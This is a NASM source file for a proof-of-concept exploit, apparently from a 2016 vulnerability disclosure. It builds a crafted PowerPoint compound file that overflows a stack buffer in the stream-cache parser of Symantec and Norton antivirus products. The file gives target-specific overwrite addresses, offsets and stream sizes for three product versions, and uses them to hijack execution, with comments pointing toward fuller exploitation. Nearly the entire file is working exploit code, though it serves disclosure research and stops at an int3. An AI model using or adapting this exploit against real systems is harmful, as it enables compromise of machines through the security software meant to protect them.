%include "ms-ppt.inc"
%include "ms-cfb.inc"

;
; Symantec/Norton Antivirus PowerPoint Stream Cache Stack Buffer Overflow PoC.
;
; This PoC demonstrates the first-stage of exploitation by gaining control of
; execution and redirecting eip to an int3 instruction. This NASM template
; defines just enough of the CFB format to exploit this vulnerability, probably
; not enough to make a useful file (but could be extended to do that if someone
; is interested).
;
; NOTES:
;
; * The input document data is in `db poi(esi)+0x10`, should be useful for a
;   pivot.
; * The PEB is not randomized, so db poi(7efde008) will always (?) be
;   ImageBaseAddress.
; * You can create a small chain of partial overwrites of all return addresses
;   on the stack using multiple calls to SSCacheRead. This is realllllly
;   complicated to align though. I hope this can be avoided.
;
; Tavis Ormandy <taviso@google.com>, April 2016
;
;   1: Norton Antivirus Windows, ccscanw version 13.1.2.19
;   2: Symantec Protection Engine Linux 32bit
;   3: Symantec Endpoint Protection x86, ccscanw version 12.12.0.15
;

%define target 1

%if target == 1
        ; 0:069> s (@eip & 0xffff0000) Lffff cc
        ; 6cbc9ba3  cc 01 00 00 80 bb 68 46-00 00 00 0f 84 82 00 00  ......hF........
        ; ...
        %define OverwriteAddress 0x9ba3     ; Overwrite low word of return address
        %define OverwriteOffset 502         ; Distance into stream that aligns with return address
        %define FirstSize 913               ; These two sizes adjust the stream cache alignment
        %define SecondSize 278              ; changing them will modify the overflow parameters (distance, offset, size, etc)
        %warning "Target: Norton Antivirus Windows, ccscanw version 13.1.2.19"
%elif target == 2
        ; (gdb) find /b /1 ((unsigned)$pc & 0xffff0000), +0xffff, 0xcc
        ; 0xf56e06d6 <_Z23SSCreateDirEntriesArrayP10tagSS_ROOTR20CDirectoryEntryArray+70>
        ; 1 pattern found.
        %define OverwriteAddress 0x06d6
        %define OverwriteOffset 50
        %define FirstSize 937
        %define SecondSize 302

        %warning "Target: Symantec Protection Engine Linux 32bit"
%elif target == 3
        %define OverwriteAddress 0xd27d
        %define OverwriteOffset 502
        %define FirstSize 913
        %define SecondSize 278
        %warning "Target: Symantec Endpoint Protection x86, ccscanw version 12.12.0.15"
%else
        %error You must define an exploit target.
%endif


ORG 0

; Compound File Header, from [MS-CFB] Section 2.2
section header
    istruc CompoundFileHeader
        at CompoundFileHeader.Signature,        dq 0xE11AB1A1E011CFD0
        at CompoundFileHeader.MinorVersion,     dw 0x3E
        at CompoundFileHeader.MajorVersion,     dw 3
        at CompoundFileHeader.ByteOrder,        dw 0xFFFE
        at CompoundFileHeader.SectorShift,      dw 9
        at CompoundFileHeader.MiniSectorShift,  dw 6
        at CompoundFileHeader.NumberFatSect,    dw 1
        at CompoundFileHeader.DirectoryStart,   dw RootDirectory.SectorID
        at CompoundFileHeader.MiniCutoffSize,   dd 4096
        at CompoundFileHeader.Difat,            dd FileAllocationTable.SectorID
    iend
    align 512, db 0

section directory
RootDirectory:
    .SectorID equ 0
RootEntry:
    .StreamID equ 0
    istruc DirectoryEntry
        at DirectoryEntry.Name,             dw __utf16__('Root Entry')
        at DirectoryEntry.ObjectType,       db 5            ; Root Storage
        at DirectoryEntry.LeftSiblingID,    dd NOSTREAM
        at DirectoryEntry.RightSiblingID,   dd NOSTREAM
        at DirectoryEntry.ChildID,          dd StorageRoot.StreamID
    iend
StorageRoot:
    .StreamID equ 1
    istruc DirectoryEntry
        at DirectoryEntry.Name,             dw __utf16__('Storage')
        at DirectoryEntry.ObjectType,       db 2            ; Stream
        at DirectoryEntry.LeftSiblingID,    dd CurrentUserStream.StreamID
        at DirectoryEntry.RightSiblingID,   dd DocStream.StreamID
        at DirectoryEntry.ChildID,          dd NOSTREAM
    iend
CurrentUserStream:
    .StreamID equ 2
    istruc DirectoryEntry
        at DirectoryEntry.Name,             dw __utf16__('Current User')
        at DirectoryEntry.ObjectType,       db 2            ; Stream
        at DirectoryEntry.LeftSiblingID,    dd NOSTREAM
        at DirectoryEntry.RightSiblingID,   dd NOSTREAM
        at DirectoryEntry.ChildID,          dd NOSTREAM
        at DirectoryEntry.StartingSector,   dd CurrentUserStreamData.SectorID
        at DirectoryEntry.StreamSize,       dq ~0           ; Ignore
    iend
DocStream:
    .StreamID equ 3
    istruc DirectoryEntry
        at DirectoryEntry.Name,             dw __utf16__('PowerPoint Document')
        at DirectoryEntry.ObjectType,       db 2            ; Stream Object
        at DirectoryEntry.LeftSiblingID,    dd NOSTREAM
        at DirectoryEntry.RightSiblingID,   dd NOSTREAM
        at DirectoryEntry.ChildID,          dd NOSTREAM
        at DirectoryEntry.StartingSector,   dd DocStreamData.SectorID
        at DirectoryEntry.StreamSize,       dq DocStreamSize
    iend

section storage
CurrentUserStreamData:
    .SectorID equ 2
    istruc RecordHeader
        at RecordHeader.recType,                dw RT_CurrentUserAtom
        at RecordHeader.recLen,                 dd CurrentUserAtom_size
    iend
    istruc CurrentUserAtom
        at CurrentUserAtom.offsetToCurrentEdit, dd DocStreamData.UserEdit \
                                                 - DocStreamData
    iend
    align 512, db 0

DocStreamData:
    .SectorID equ 3

    .Document:
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_Document
            at RecordHeader.recLen,             dd ~0
        iend

        istruc RecordHeader
            at RecordHeader.recType,            dw RT_List
            at RecordHeader.recLen,             dd RecordHeader_size    \
                                                 + RecordHeader_size    \
                                                 + VBAInfoAtom_size
        iend
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_VbaInfo
            at RecordHeader.recLen,             dd RecordHeader_size    \
                                                 + VBAInfoAtom_size
        iend
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_VbaInfoAtom
            at RecordHeader.recLen,             dd VBAInfoAtom_size
        iend
        istruc VBAInfoAtom
            at VBAInfoAtom.persistIdRef,        dd 2
        iend
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_EndDocumentAtom
        iend

        ; This is just for debugging.
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_CString
            at RecordHeader.recLen,             dd 512
        iend
        times 512 db 'A'

    .PersistDirectory:
        cPersist equ 2
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_PersistDirectoryAtom
            at RecordHeader.recLen,             dd 4 + (cPersist * 4)
        iend
        ; persistId (20 bits)
        ; cPersist  (12 bits)
        dd      000000000000000000001b | (cPersist << 20)

        ; rgPersistOffset[cPersist]
        dd DocStreamData.Document - DocStreamData       ; 1
        dd DocStreamData.VbaProjectStg - DocStreamData  ; 2

    .UserEdit:
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_UserEditAtom
            at RecordHeader.recLen,             dd UserEditAtom_size
        iend
        istruc UserEditAtom
            at UserEditAtom.offsetPersistDir,   \
                dd DocStreamData.PersistDirectory - DocStreamData
            at UserEditAtom.docPersistIdRef,    dd 1
        iend

    .VbaProjectStg:
        istruc RecordHeader
            at RecordHeader.recVerInstance,     dw VerIns(0, 1)
            at RecordHeader.recType,            dw RT_ExternalOleObjectStg
            at RecordHeader.recLen,             dd VbaProjectStgSize    \
                                                 - RecordHeader_size
        iend
        istruc ExOleObjStgCompressedAtom
        iend
        incbin "VbaProjectStg"
        VbaProjectStgSize equ $ - DocStreamData.VbaProjectStg
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_CString
            at RecordHeader.recLen,             dd FirstSize
        iend
        times OverwriteOffset                   db 'C'
        times 1                                 dw OverwriteAddress
        times FirstSize - 2 - OverwriteOffset   db 'D'

        ; This record is just for padding
        istruc RecordHeader
            at RecordHeader.recType,            dw RT_CString
            at RecordHeader.recLen,             dd SecondSize
        iend
        times SecondSize db 'B'

        align 512, db 0

    DocStreamSize equ $ - DocStreamData

; The FAT is declared here so we can calculate sector chain lengths
; automatically. The follow= directive relocates the section back to a
; predicatable sector.
;
; Because this file is not fragmented, we just calculate how many consecutive
; 512 byte sectors we need to chain together to fit all our data, which we can
; do with NASM macros.
section fat follows=directory
FileAllocationTable:
    .SectorID equ 1
    dd ENDOFCHAIN                       ; 0 Directory (1 Sector)
    dd FATSECT                          ; 1 FAT       (1 Sector)
    dd ENDOFCHAIN                       ; 2 Storage   (1 Sector)
    %assign i 0
    %rep DocStreamSize / 512            ; 3 Storage   (Variable)
    %assign i i + 1
    dd DocStreamData.SectorID + i
    %endrep
    dd ENDOFCHAIN

    align 512, db 0xff
